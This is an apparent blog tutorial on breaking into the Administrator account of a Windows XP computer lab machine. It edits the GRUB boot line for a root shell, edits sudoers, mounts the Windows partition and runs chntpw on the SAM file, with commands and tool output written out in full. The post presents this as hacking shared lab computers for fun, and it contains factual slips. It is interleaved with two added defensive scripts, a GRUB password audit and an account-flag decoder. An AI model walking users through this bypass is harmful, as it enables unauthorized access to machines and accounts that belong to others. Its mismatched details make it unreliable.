Crack Windows-XP Administrator account Password

Computer lab sessions seem to be the most boring sessions if they are not used properly. I hacked into a Windows XP Administrator account using Ubuntu 10.10. Before getting into Windows it is important to become the root user in Ubuntu/Linux. GRUB (the list shown at system startup for choosing among the installed operating systems) can be used to get a root shell. Move the cursor to the Linux distro's entry (say Ubuntu 11.10 Natty) and press 'e' (the option to edit the GRUB entry). At the end of the third line in the new list there will be ro quiet splash; replace those words with rw init=/bin/bash. Then press Ctrl+X to boot. This drops you into a bash shell as the root user: a prompt prefixed with 'root' will appear, which means full access to the system! Now, edit /etc/sudoers.
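The step above works because an unprotected GRUB menu lets anyone at the console press 'e' and rewrite the kernel line. The check a defender would want is whether grub.cfg declares a superuser and a password, which is what makes GRUB 2 require authentication before editing an entry. The following audit script is an added example, not code from the original post or from the GRUB project; both grub.cfg bodies are constructed samples, and the PBKDF2 hash in the second one is a placeholder, not a real hash.

```python
"""Audit a GRUB 2 grub.cfg body for the settings that gate entry editing.

Added example (not from the original post). GRUB 2 semantics assumed here:
with ``set superusers`` and a ``password_pbkdf2`` line present, only the
superuser may edit entries; entries marked ``--unrestricted`` can still be
booted without a password, but not edited.
"""
import re

# Constructed sample: a default-looking, unprotected configuration.
UNPROTECTED_CFG = """\
set timeout=5
menuentry 'Ubuntu' --class ubuntu {
    linux /boot/vmlinuz root=/dev/sda1 ro quiet splash
}
"""

# Constructed sample: superuser declared, hash is a labelled placeholder.
PROTECTED_CFG = """\
set superusers="admin"
password_pbkdf2 admin grub.pbkdf2.sha512.10000.PLACEHOLDER_SALT.PLACEHOLDER_HASH
menuentry 'Ubuntu' --class ubuntu --unrestricted {
    linux /boot/vmlinuz root=/dev/sda1 ro quiet splash
}
menuentry 'Ubuntu (recovery mode)' --class ubuntu {
    linux /boot/vmlinuz root=/dev/sda1 ro single
}
"""

SUPERUSERS_RE = re.compile(r'^\s*set\s+superusers=["\']?([^"\'\n]+)', re.M)
PASSWORD_RE = re.compile(r'^\s*password(_pbkdf2)?\s+\S+\s+\S+', re.M)
MENUENTRY_RE = re.compile(r'^\s*menuentry\s+(["\'])(.*?)\1([^{]*)\{', re.M)


def audit_grub_cfg(text):
    """Return findings for one grub.cfg body.

    superusers            value of ``set superusers=...`` or None
    password_set          True if a password/password_pbkdf2 line exists
    unrestricted_entries  titles bootable without the password
    restricted_entries    titles that need the superuser password to boot
    editing_protected     True only when both superusers and a password exist
    """
    findings = {"superusers": None, "password_set": False,
                "unrestricted_entries": [], "restricted_entries": [],
                "editing_protected": False}
    m = SUPERUSERS_RE.search(text)
    if m:
        findings["superusers"] = m.group(1).strip()
    findings["password_set"] = PASSWORD_RE.search(text) is not None
    for em in MENUENTRY_RE.finditer(text):
        title, opts = em.group(2), em.group(3)
        key = "unrestricted_entries" if "--unrestricted" in opts else "restricted_entries"
        findings[key].append(title)
    findings["editing_protected"] = bool(findings["superusers"]) and findings["password_set"]
    return findings


def weak_points(findings):
    """Turn findings into the short list of things an admin has to fix."""
    issues = []
    if not findings["superusers"]:
        issues.append("no 'set superusers': anyone at the console can press 'e' "
                      "and change the kernel command line")
    elif not findings["password_set"]:
        issues.append("superusers declared but no password line: GRUB will not prompt")
    return issues


if __name__ == "__main__":
    for name, cfg in (("unprotected", UNPROTECTED_CFG), ("protected", PROTECTED_CFG)):
        f = audit_grub_cfg(cfg)
        print(name, f, weak_points(f))
```

On a current Ubuntu the hash comes from grub-mkpasswd-pbkdf2, the two lines go into /etc/grub.d/40_custom, and update-grub regenerates grub.cfg. This closes only the edit-the-kernel-line path: booting from a live USB or removing the disk gives the same root access, so a firmware boot-order lock and full-disk encryption are what actually protect the data on the machine.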
In order to edit /etc/sudoers you have to use the visudo editor.

Find this line:

root ALL=(ALL) ALL

and just under it add a line giving the desired user name:

your-username ALL=(ALL) ALL

Now reboot the system. Log in using that user name and password, and you are now the root user of the system. Open a terminal (Applications -> Terminal, or the default shortcut Ctrl+Alt+T) and install chntpw, a utility to overwrite Windows NT/2000 SAM passwords. Find out the partition on which Windows is installed using either of these commands:

$ sudo fdisk -l
$ sudo parted /dev/sda print

Now, mount the Windows file system (the C: drive in most cases) using this command:

$ sudo mount /dev/sda# /mnt/

# is the number of the Windows partition that you found with fdisk or parted.
/mnt is the directory where you are going to mount it. You can use any directory you want; I prefer this one.

Change into the mounted Windows partition under /mnt using cd. Then, using your basic Linux skills, cd into the directory Windows/System32/config.
You are now almost done. Use this command to modify the SAM file. The SAM (Security Account Manager) is a database present on servers running Windows Server 2003 that stores user accounts and security descriptors for users on the local computer:

$ sudo chntpw SAM

When you run this command you will see output like this:

* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length : 0
Password history count : 0
| RID -|---------- Username ------------| Admin? |- Lock? --|
| 01f4 | Administrator                  | ADMIN  | dis/lock |
| 03e8 | corelabs                       | ADMIN  |          |
| 01f5 | Guest                          |        | *BLANK*  |
| 03ee | HomeGroupUser$                 |        |          |
| 03e9 | VUSR_CORELABS-PC               |        |          |
---------------------> SYSKEY CHECK Not Set (not installed, good!)
SAM Account\F : 0 -> off
SECURITY PolSecretEncryptionKey: -1 -> Not Set (OK if this is NT4)
Syskey not installed!

RID : 0500 [01f4]
Username: Administrator
comment : Built-in account for administering the computer/domain
homedir :

User is member of 1 groups:
00000220 = Administrators (which has 2 members)

Account bits: 0x0211 =
[X] Disabled | [ ] Homedir req. | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act |
[X] Pwd don't expir | [ ] Auto lockout | [ ] (unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) |

Failed login count: 0, while max tries is: 0
Total login count: 1

- - - - User Edit Menu:
1 - Clear (blank) user password
2 - Edit (set new) user password (careful with this on XP or Vista)
3 - Promote user (make user an administrator)
4 - Unlock and enable user account [probably locked now]
q - Quit editing user, back to user select
Select: [q]>

Depending on your needs, use any of these options [1, 2, 3, 4, q].
Don't forget to save the SAM file after the changes, or else there won't be any effect. When you boot into Windows the next time you will be able to access the Administrator account if you used option 1 or 2.
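The "Account bits: 0x0211" line in the chntpw output above is the account's SAM account-control word, and the checkbox grid is that word decoded bit by bit. Knowing the mapping lets you read such a dump (or a later one, when checking whether an account was enabled or had its password requirement dropped offline) without chntpw in front of you. The decoder below is an added example written for this post, not code from chntpw; the bit values are the standard SAM ACB_* flags in the order chntpw prints them, and the sample line is the one from the output above.

```python
"""Decode the 'Account bits' value that chntpw prints for a SAM user.

Added example, not from chntpw or the original post. ACB_FLAGS lists the
standard SAM account-control bits, laid out row-major in the same order as
chntpw's 5x3 checkbox grid.
"""
import re

ACB_FLAGS = [
    (0x0001, "Disabled"),        (0x0002, "Homedir req."),   (0x0004, "Passwd not req."),
    (0x0008, "Temp. duplicate"), (0x0010, "Normal account"), (0x0020, "NMS account"),
    (0x0040, "Domain trust ac"), (0x0080, "Wks trust act."), (0x0100, "Srv trust act"),
    (0x0200, "Pwd don't expir"), (0x0400, "Auto lockout"),   (0x0800, "(unknown 0x08)"),
    (0x1000, "(unknown 0x10)"),  (0x2000, "(unknown 0x20)"), (0x4000, "(unknown 0x40)"),
]

# Line taken from the chntpw output shown in the post.
SAMPLE_LINE = "Account bits: 0x0211 ="


def parse_account_bits_line(line):
    """Extract the hex account-control value from a line like SAMPLE_LINE."""
    m = re.search(r"Account bits:\s*0x([0-9a-fA-F]+)", line)
    if not m:
        raise ValueError("no 'Account bits' value in: %r" % line)
    return int(m.group(1), 16)


def decode_account_bits(value):
    """Return the labels of all flags set in a 16-bit account-control value."""
    return [label for bit, label in ACB_FLAGS if value & bit]


def render_grid(value):
    """Reproduce chntpw's checkbox layout for the given value."""
    cells = ["[%s] %-16s" % ("X" if value & bit else " ", label) for bit, label in ACB_FLAGS]
    rows = ["| ".join(cells[i:i + 3]) + "|" for i in range(0, len(cells), 3)]
    return "\n".join(rows)


def usable_for_logon(value):
    """True if nothing in the control word itself blocks an interactive logon.

    Disabled (0x0001) and Auto lockout (0x0400) both block logon; the other
    bits describe the account type or password policy, not its availability.
    """
    return not (value & 0x0001) and not (value & 0x0400)


def diff_account_bits(before, after):
    """Flags that changed between two dumps of the same account, e.g. a
    dump taken at build time and one taken during an investigation."""
    changed = (before ^ after)
    return {label: bool(after & bit) for bit, label in ACB_FLAGS if changed & bit}


if __name__ == "__main__":
    value = parse_account_bits_line(SAMPLE_LINE)
    print("0x%04x ->" % value, decode_account_bits(value))
    print(render_grid(value))
    print("usable for logon:", usable_for_logon(value))
```

Reading the post's own value: 0x0211 is 0x0200 | 0x0010 | 0x0001, i.e. password never expires, normal account, disabled, which is exactly the three [X] boxes in the dump. diff_account_bits is the defender's use: comparing the control word of a built-in account between a known-good dump and a later one shows whether the Disabled bit was cleared or Passwd not req. was set outside of Windows.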

Hacking is fun, so Have fun!!